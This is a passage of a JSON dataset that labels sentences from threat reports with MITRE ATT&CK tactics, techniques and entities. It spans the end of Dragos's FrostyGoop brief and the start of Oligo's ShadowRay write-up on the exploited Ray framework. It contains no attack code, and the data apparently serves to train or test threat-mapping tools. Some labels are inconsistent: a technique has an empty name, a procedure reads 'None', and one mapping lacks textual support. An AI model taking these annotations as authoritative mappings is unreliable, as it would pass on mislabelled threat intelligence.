"uid": "mitre-88_mitre_report-p12-s150-f13f2e", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 12, "sentence_id": 150, "context_before": "2. DEFENSIBLEARCHITECTURE\nThis attack highlights the lack of adequate network segmentation and the presence of internet-exposed controllers.", "sentence_text": "barriers to prevent direct access from the internet to critical systems.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p12-s151-6d0ddd", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 12, "sentence_id": 151, "context_before": "barriers to prevent direct access from the internet to critical systems.", "sentence_text": "Such measures would limit the spread of malware and restrict the blast radius of potential cyber attacks.\n3.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p12-s152-c89532", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 12, "sentence_id": 152, "context_before": "Such measures would limit the spread of malware and restrict the blast radius of potential cyber attacks.\n3.", "sentence_text": "4. SECUREREMOTEACCESS", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p12-s153-17fd61", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 12, "sentence_id": 153, "context_before": "4. SECUREREMOTEACCESS", "sentence_text": "The FrostyGoop incident exploited vulnerabilities associated with remote access points.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "exploit remote access vulnerabilities", "entities": [ { "text": "FrostyGoop", "start": 4, "end": 14, "label": "MalwareTool" }, { "text": "remote access points", "start": 66, "end": 86, "label": "Infrastructure_Indicator" }, { "text": "exploited", "start": 24, "end": 33, "label": "Action" } ] }, { "uid": "mitre-88_mitre_report-p12-s154-9e70ea", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 12, "sentence_id": 154, "context_before": "The FrostyGoop incident exploited vulnerabilities associated with remote access points.", "sentence_text": "Secure remote access protections must be strictly enforced to safeguard against similar threats.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p12-s155-1b5c67", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 12, "sentence_id": 155, "context_before": "Secure remote access protections must be strictly enforced to safeguard against similar threats.", "sentence_text": "Furthermore, remote access should be granted on a need-to-use basis with regular audits to review access rights and privileges.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p12-s156-8c8ad1", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 12, "sentence_id": 156, "context_before": "Furthermore, remote access should be granted on a need-to-use basis with regular audits to review access rights and privileges.", "sentence_text": "5. RISK-BASEDVULNERABILITYMANAGEMENT\nEffective vulnerability management tailored to the risk profile of ICS components would involve regular assessments to identify and address vulnerabilities that adversaries could exploit.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p12-s157-9f7000", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 12, "sentence_id": 157, "context_before": "5. RISK-BASEDVULNERABILITYMANAGEMENT\nEffective vulnerability management tailored to the risk profile of ICS components would involve regular assessments to identify and address vulnerabilities that adversaries could exploit.", "sentence_text": "Mitigating network exploitable vulnerabilities is vital, especially when evidence of active exploitation exists.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p12-s158-94a33f", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 12, "sentence_id": 158, "context_before": "Mitigating network exploitable vulnerabilities is vital, especially when evidence of active exploitation exists.", "sentence_text": "Where patches are not feasible, compensating controls such as enhanced monitoring or restrictive access controls will mitigate the potential risks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p12-s159-b5c74a", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 12, "sentence_id": 159, "context_before": "Where patches are not feasible, compensating controls such as enhanced monitoring or restrictive access controls will mitigate the potential risks.", "sentence_text": "Conclusion\nThe discovery and analysis of the FrostyGoop ICS malware underscore the significant risks posed to OT environments.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p12-s160-cae342", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 12, "sentence_id": 160, "context_before": "Conclusion\nThe discovery and analysis of the FrostyGoop ICS malware underscore the significant risks posed to OT environments.", "sentence_text": "FrostyGoop’s capabilities to interact with ICS devices via Modbus TCP and its undetected status by antivirus vendors highlight the critical need for robust OT cybersecurity measures.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T0885", "name": "" } ], "procedure": "interact with ICS devices via Modbus TCP", "entities": [ { "text": "FrostyGoop", "start": 0, "end": 10, "label": "MalwareTool" }, { "text": "ICS devices", "start": 43, "end": 54, "label": "Infrastructure_Indicator" }, { "text": "Modbus TCP", "start": 59, "end": 69, "label": "Infrastructure_Indicator" }, { "text": " interact", "start": 28, "end": 37, "label": "Action" } ] }, { "uid": "mitre-88_mitre_report-p12-s161-803842", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 12, "sentence_id": 161, "context_before": "FrostyGoop’s capabilities to interact with ICS devices via Modbus TCP and its undetected status by antivirus vendors highlight the critical need for robust OT cybersecurity measures.", "sentence_text": "The cyber attack on the municipal district energy company in Ukraine, is a stark reminder of the potential real-world impacts of such vulnerabilities, emphasizing the necessity for adequate security controls and continuous OT network security monitoring.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p12-s162-a4e19a", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 12, "sentence_id": 162, "context_before": "The cyber attack on the municipal district energy company in Ukraine, is a stark reminder of the potential real-world impacts of such vulnerabilities, emphasizing the necessity for adequate security controls and continuous OT network security monitoring.", "sentence_text": "Organizations must prioritize the implementation of comprehensive cybersecurity frameworks to safeguard critical infrastructure from similar threats in the future.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p12-s163-4a3969", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 12, "sentence_id": 163, "context_before": "Organizations must prioritize the implementation of comprehensive cybersecurity frameworks to safeguard critical infrastructure from similar threats in the future.", "sentence_text": "Page | 10 FrostyGoop Intel Brief", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p13-s164-d3fba9", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 13, "sentence_id": 164, "context_before": "Page | 10 FrostyGoop Intel Brief", "sentence_text": "Dragos WorldView Threat Intelligence arms your organization with in-depth analysis and reporting into cyber threats targeting OT environments around the world.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p13-s165-cf2196", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 13, "sentence_id": 165, "context_before": "Dragos WorldView Threat Intelligence arms your organization with in-depth analysis and reporting into cyber threats targeting OT environments around the world.", "sentence_text": "Request a demo at:\nRequest a Demo Copyright ©2024 Dragos, Inc.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p13-s167-5fd12a", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 13, "sentence_id": 167, "context_before": "| All Rights Reserved.", "sentence_text": "| Last updated July 2024 info@dragos.com @DragosInc in @Dragos, Inc.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s1-d925ff", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "ShadowRay: First Known Attack Campaign Targeting AI Workloads Exploited In The Wild | Oligo Security Overview Thousands of publicly exposed Ray servers compromised as a result of Shadow Vulnerability TL;DR The Oligo research team has recently discovered an active attack campaign targeting a vulnerability in Ray, a widely used open-source AI framework.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "attack campaign targeting a vulnerability in Ray", "entities": [ { "text": "ShadowRay", "start": 0, "end": 9, "label": "MalwareTool" }, { "text": "Ray servers", "start": 140, "end": 151, "label": "Infrastructure_Indicator" }, { "text": "Ray", "start": 309, "end": 312, "label": "Infrastructure_Indicator" }, { "text": "AI Workloads", "start": 49, "end": 61, "label": "Infrastructure_Indicator" }, { "text": "Exploited In The Wild", "start": 62, "end": 83, "label": "Action" }, { "text": "compromised", "start": 152, "end": 163, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s2-0cc02f", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 2, "context_before": "ShadowRay: First Known Attack Campaign Targeting AI Workloads Exploited In The Wild | Oligo Security Overview Thousands of publicly exposed Ray servers compromised as a result of Shadow Vulnerability TL;DR The Oligo research team has recently discovered an active attack campaign targeting a vulnerability in Ray, a widely used open-source AI framework.", "sentence_text": "Thousands of companies and servers running AI infrastructure are exposed to the attack through a critical vulnerability that is under dispute and thus has no patch.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "exposed to the attack through a critical vulnerability", "entities": [ { "text": "AI infrastructure", "start": 43, "end": 60, "label": "Infrastructure_Indicator" }, { "text": "critical vulnerability", "start": 97, "end": 119, "label": "Infrastructure_Indicator" }, { "text": "exposed to the attack", "start": 65, "end": 86, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s3-4d33e3", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 3, "context_before": "Thousands of companies and servers running AI infrastructure are exposed to the attack through a critical vulnerability that is under dispute and thus has no patch.", "sentence_text": "This vulnerability allows attackers to take over the companies' computing power and leak sensitive data.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1496", "name": "Resource Hijacking" } ], "procedure": "take over computing power and leak data", "entities": [ { "text": "take over", "start": 39, "end": 48, "label": "Action" }, { "text": "leak sensitive data", "start": 84, "end": 103, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s4-23fb31", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 4, "context_before": "This vulnerability allows attackers to take over the companies' computing power and leak sensitive data.", "sentence_text": "This flaw has been under active exploitation for the last 7 months, affecting sectors like education, cryptocurrency, biopharma and more.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "active exploitation for the last 7 months", "entities": [ { "text": "active exploitation", "start": 25, "end": 44, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s5-dd7c5f", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 5, "context_before": "This flaw has been under active exploitation for the last 7 months, affecting sectors like education, cryptocurrency, biopharma and more.", "sentence_text": "All organizations using Ray are advised to review their environments to ensure they are not exposed and to analyze any suspicious activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s6-b26857", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 6, "context_before": "All organizations using Ray are advised to review their environments to ensure they are not exposed and to analyze any suspicious activity.", "sentence_text": "Because\nCVE-2023-48022\nwas disputed, many development teams (and most static scanning tools) are not aware that this vulnerability should concern them.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s7-393215", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 7, "context_before": "Because\nCVE-2023-48022\nwas disputed, many development teams (and most static scanning tools) are not aware that this vulnerability should concern them.", "sentence_text": "Some of them might have missed this documentation section of Ray, while some of them are unaware of this feature.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s8-026e25", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 8, "context_before": "Some of them might have missed this documentation section of Ray, while some of them are unaware of this feature.", "sentence_text": "Researchers at Oligo Security have observed instances of CVE-2023-48022 being actively exploited in the wild, making the disputed CVE a “ shadow vulnerability ”—a CVE that doesn’t show up in static scans but can still lead to breaches and significant losses.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "CVE-2023-48022 being actively exploited in the wild", "entities": [ { "text": "CVE-2023-48022", "start": 57, "end": 71, "label": "Infrastructure_Indicator" }, { "text": "shadow vulnerability", "start": 138, "end": 158, "label": "Infrastructure_Indicator" }, { "text": "actively exploited in the wild", "start": 78, "end": 108, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s9-a1a1ed", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 9, "context_before": "Researchers at Oligo Security have observed instances of CVE-2023-48022 being actively exploited in the wild, making the disputed CVE a “ shadow vulnerability ”—a CVE that doesn’t show up in static scans but can still lead to breaches and significant losses.", "sentence_text": "In our research, we found that thousands of publicly exposed Ray servers all over the world were already compromised as a result of this new vulnerability, dubbed ShadowRay by Oligo’s research team.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "compromise Ray servers via ShadowRay", "entities": [ { "text": "ShadowRay", "start": 163, "end": 172, "label": "MalwareTool" }, { "text": "Ray servers", "start": 61, "end": 72, "label": "Infrastructure_Indicator" }, { "text": "compromised", "start": 105, "end": 116, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s10-22c22a", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 10, "context_before": "In our research, we found that thousands of publicly exposed Ray servers all over the world were already compromised as a result of this new vulnerability, dubbed ShadowRay by Oligo’s research team.", "sentence_text": "Some of the impacted machines were compromised for at least 7 months.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "impacted machines were compromised for at least 7 months", "entities": [ { "text": "impacted machines", "start": 12, "end": 29, "label": "Infrastructure_Indicator" }, { "text": "compromised", "start": 35, "end": 46, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s11-74fa11", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 11, "context_before": "Some of the impacted machines were compromised for at least 7 months.", "sentence_text": "Many of the machines included command history, making it much easier for attackers to understand what resides on the current machine and possibly leaking sensitive secrets from production that were used in previous commands.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1552.001", "name": "Credentials In Files" } ], "procedure": "understand what resides and leak sensitive secrets from command history", "entities": [ { "text": "attackers", "start": 73, "end": 82, "label": "ThreatActor" }, { "text": "leaking sensitive secrets", "start": 146, "end": 171, "label": "Action" }, { "text": "machines", "start": 12, "end": 20, "label": "Infrastructure_Indicator" }, { "text": "command history", "start": 30, "end": 45, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-89_mitre_report-p1-s12-5919ea", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 12, "context_before": "Many of the machines included command history, making it much easier for attackers to understand what resides on the current machine and possibly leaking sensitive secrets from production that were used in previous commands.", "sentence_text": "A complete list of Indications of Compromise (IoCs) is available at the end of the blog.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s13-383431", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 13, "context_before": "A complete list of Indications of Compromise (IoCs) is available at the end of the blog.", "sentence_text": "Hundreds of companies have been publicly exposed to remote code execution (RCE) through Ray, with some remaining vulnerable to this day.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "publicly exposed to remote code execution (RCE) through Ray", "entities": [ { "text": "Ray", "start": 88, "end": 91, "label": "Infrastructure_Indicator" }, { "text": "remote code execution", "start": 52, "end": 73, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s14-31fc0e", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 14, "context_before": "Hundreds of companies have been publicly exposed to remote code execution (RCE) through Ray, with some remaining vulnerable to this day.", "sentence_text": "Oligo researchers (who have been at the forefront of uncovering shadow vulnerabilities) named this CVE ShadowRay , marking the first known instance of AI workloads actively being exploited in the wild through vulnerabilities in modern AI infrastructure.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "exploit AI workloads in the wild", "entities": [ { "text": "ShadowRay", "start": 103, "end": 112, "label": "MalwareTool" }, { "text": "exploited", "start": 179, "end": 188, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s15-38a58d", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 15, "context_before": "Oligo researchers (who have been at the forefront of uncovering shadow vulnerabilities) named this CVE ShadowRay , marking the first known instance of AI workloads actively being exploited in the wild through vulnerabilities in modern AI infrastructure.", "sentence_text": "In this summary of our research, we will dive into:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s16-9c0da9", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 16, "context_before": "In this summary of our research, we will dive into:", "sentence_text": "Why AI infrastructure is a goldmine for attackers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s17-19853f", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 17, "context_before": "Why AI infrastructure is a goldmine for attackers.", "sentence_text": "The Ray clusters that have been exploited in the wild, including the wealth of data that has been compromised, the collective value of compromised machines, how attackers are monetizing their efforts, and more.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1496", "name": "Resource Hijacking" } ], "procedure": "exploit Ray clusters and monetize access", "entities": [ { "text": "Ray clusters", "start": 4, "end": 16, "label": "Infrastructure_Indicator" }, { "text": "exploited", "start": 32, "end": 41, "label": "Action" }, { "text": "compromised", "start": 98, "end": 109, "label": "Action" }, { "text": "monetizing", "start": 175, "end": 185, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s18-954bde", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 18, "context_before": "The Ray clusters that have been exploited in the wild, including the wealth of data that has been compromised, the collective value of compromised machines, how attackers are monetizing their efforts, and more.", "sentence_text": "Disclaimer:\nThis blog will discuss recent vulnerabilities in the open-source Ray framework that were reported by Bishop Fox", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s20-bc1b57", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 20, "context_before": "[2], Sierra Haex", "sentence_text": "[3], and Protect AI", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s22-65a9b0", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 22, "context_before": "[4].", "sentence_text": "It does not relate to Anyscale’s (the developers of Ray) SaaS offerings or paid products.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s23-91b96b", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 23, "context_before": "It does not relate to Anyscale’s (the developers of Ray) SaaS offerings or paid products.", "sentence_text": "The sole intention of this blog is to support users of Ray by increasing awareness of its security aspects and common pitfalls.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s24-735ca3", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 24, "context_before": "The sole intention of this blog is to support users of Ray by increasing awareness of its security aspects and common pitfalls.", "sentence_text": "In This Article:\nAI Infrastructure: A Goldmine for Attackers", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s25-aa9b6e", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 25, "context_before": "In This Article:\nAI Infrastructure: A Goldmine for Attackers", "sentence_text": "Meet Ray", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s26-782f4c", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 26, "context_before": "Meet Ray", "sentence_text": "The Story of CVE-2023-48022: ShadowRay Explained Indications of Compromise (IoCs)\nSpecial Thanks\nAI Infrastructure: A Goldmine for Attackers A typical AI environment contains a wealth of sensitive information—enough to take an entire company down.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s27-07bd06", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 27, "context_before": "The Story of CVE-2023-48022: ShadowRay Explained Indications of Compromise (IoCs)\nSpecial Thanks\nAI Infrastructure: A Goldmine for Attackers A typical AI environment contains a wealth of sensitive information—enough to take an entire company down.", "sentence_text": "Why is an AI environment such a lucrative environment for attackers?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s28-cedadf", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 28, "context_before": "Why is an AI environment such a lucrative environment for attackers?", "sentence_text": "Let’s take a look at the components and the risks they present.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s29-48f3bf", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 29, "context_before": "Let’s take a look at the components and the risks they present.", "sentence_text": "An ML-OPS environment consists of many services that communicate with each other, inside the same cluster and between clusters.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s30-19cca3", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 30, "context_before": "An ML-OPS environment consists of many services that communicate with each other, inside the same cluster and between clusters.", "sentence_text": "AI models are now connected to company databases and knowledge graphs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s31-7fb44c", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 31, "context_before": "AI models are now connected to company databases and knowledge graphs.", "sentence_text": "The AI infrastructure can be a single point of failure for AI-driven companies—and a hidden treasure for attackers.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1496", "name": "Resource Hijacking" } ], "procedure": "None", "entities": [ { "text": "attackers", "start": 105, "end": 114, "label": "ThreatActor" }, { "text": "AI infrastructure", "start": 4, "end": 21, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-89_mitre_report-p1-s32-b2640c", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 32, "context_before": "The AI infrastructure can be a single point of failure for AI-driven companies—and a hidden treasure for attackers.", "sentence_text": "Meet Ray\nRay\nis a unified framework for scaling AI and Python applications for a variety of purposes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s33-7813c2", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 33, "context_before": "Meet Ray\nRay\nis a unified framework for scaling AI and Python applications for a variety of purposes.", "sentence_text": "A set of complementary AI Libraries and extensions that are built on top of it or depend on it, for accelerating and distributing domain-specific ML workloads efficiently.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s34-101dcf", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 34, "context_before": "A set of complementary AI Libraries and extensions that are built on top of it or depend on it, for accelerating and distributing domain-specific ML workloads efficiently.", "sentence_text": "Who Uses Ray and How?\nToday, Ray has 30K stars on GitHub [5].", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s35-0f5fa6", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 35, "context_before": "Who Uses Ray and How?\nToday, Ray has 30K stars on GitHub [5].", "sentence_text": "Ray\nuses boilerplate code that bootstraps product installations and deployment using Helm charts and other cloud-native methods.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s36-1a9207", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 36, "context_before": "Ray\nuses boilerplate code that bootstraps product installations and deployment using Helm charts and other cloud-native methods.", "sentence_text": "Ray’s many integrations with cloud providers enable managed services use cases as well.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s37-2e32a8", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 37, "context_before": "Ray’s many integrations with cloud providers enable managed services use cases as well.", "sentence_text": "Models like GPT-4 comprise billions of parameters, requiring massive computational power.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s38-94d243", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 38, "context_before": "Models like GPT-4 comprise billions of parameters, requiring massive computational power.", "sentence_text": "Such large models cannot possibly fit on the memory of a single machine.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s39-c756fc", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 39, "context_before": "Such large models cannot possibly fit on the memory of a single machine.", "sentence_text": "Ray is the enabling technology that allows these models to run.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s40-84d21d", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 40, "context_before": "Ray is the enabling technology that allows these models to run.", "sentence_text": "Ray quickly became a best practice in the industry—especially for AI practitioners, who are proficient in Python and often require models to run and distribute among multiple GPUs and machines.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s41-6cbdce", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 41, "context_before": "Ray quickly became a best practice in the industry—especially for AI practitioners, who are proficient in Python and often require models to run and distribute among multiple GPUs and machines.", "sentence_text": "Ray requires very low proficiency in Python.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s42-4eb4a9", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 42, "context_before": "Ray requires very low proficiency in Python.", "sentence_text": "It has a lean Python API with minimal configuration.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s43-e496bd", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 43, "context_before": "It has a lean Python API with minimal configuration.", "sentence_text": "Ray is the Swiss Army knife for Pythonistas and AI practitioners, allowing them to effortlessly scale their AI applications.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s44-e4fbf7", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 44, "context_before": "Ray is the Swiss Army knife for Pythonistas and AI practitioners, allowing them to effortlessly scale their AI applications.", "sentence_text": "Anyscale promptly addressed four of the issues in Ray version 2.8.1 and provided a detailed blog post explaining the vulnerabilities and their remediation", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s46-b3d8f6", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 46, "context_before": "[7].", "sentence_text": "However, in many GitHub boilerplate repositories to help companies deploy Ray to their cloud environment, Ray remains vulnerable not only to the CVEs that were successfully fixed (running Ray versions between 2.6.3 - 2.8.0), but also ShadowRay—because Ray’s dashboard always binds on 0.0.0.0 (all network interfaces), together with port forwarding on 0.0.0.0, possibly exposing the machine to the internet by default", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Ray’s dashboard binds on 0.0.0.0 exposing the machine to the internet", "entities": [ { "text": "ShadowRay", "start": 234, "end": 243, "label": "MalwareTool" }, { "text": "Ray", "start": 106, "end": 109, "label": "Infrastructure_Indicator" }, { "text": "GitHub boilerplate repositories", "start": 17, "end": 48, "label": "Infrastructure_Indicator" }, { "text": "Ray’s dashboard", "start": 252, "end": 267, "label": "Infrastructure_Indicator" }, { "text": "0.0.0.0", "start": 284, "end": 291, "label": "Infrastructure_Indicator" }, { "text": "binds on", "start": 275, "end": 283, "label": "Action" }, { "text": "port forwarding on 0.0.0.0", "start": 332, "end": 358, "label": "Action" }, { "text": "exposing the 